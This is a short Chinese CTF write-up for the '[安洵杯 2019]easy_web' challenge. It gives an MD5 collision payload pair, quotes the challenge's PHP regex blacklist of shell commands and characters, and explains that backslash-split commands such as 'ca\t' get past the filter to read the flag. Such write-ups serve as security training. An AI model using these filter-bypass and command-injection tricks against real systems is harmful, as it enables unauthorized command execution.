刷题记录:[安洵杯 2019]easy_web
[TOC]php
刷题记录:[安洵杯 2019]easy_web
题目复现连接:https://buuoj.cn/challenges 参考连接:第二届安洵杯2019部分writeuplinux
知识点
md5强类型碰撞
%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2 %4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2web
linux命令执行绕过
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
echo("forbid ~");
echo "<br>";
}
如下正则能够过滤\bash
<?php
$cmd="\\";
echo $cmd;
if (preg_match("/|\\\\|\?/i", $cmd)) {
echo("1");
}
if (preg_match("/\\\\/i", $cmd)) {
echo("2");
}
if (preg_match("/|\\|/i", $cmd)) {
echo("3");
}
if (preg_match("/|\|/i", $cmd)) {
echo("4");
}
// \1234
linux命令中能够加\,因此甚至能够ca\t /fl\agless
相关文章
- 1. 安洵杯 --writeup
- 2. [安洵杯 2019]easy_serialize_php
- 3. 安洵杯-crackme-wp
- 4. 安洵杯-game-wp
- 5. BUUCTF-[安洵杯 2019]easy_web
- 6. 第一届安洵杯writeup
- 7. 【安洵杯 2019】easy-web
- 8. 刷题记录:[强网杯 2019]Upload
- 9. 2019 安洵杯 Re 部分WP
- 10. 2020 第三届安洵杯 MISC Writeup
- 更多相关文章...
- • ADO 添加记录 - ADO 教程
- • ADO 更新记录 - ADO 教程
- • Tomcat学习笔记(史上最全tomcat学习笔记)
- • Composer 安装与使用
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
欢迎关注本站公众号,获取更多信息
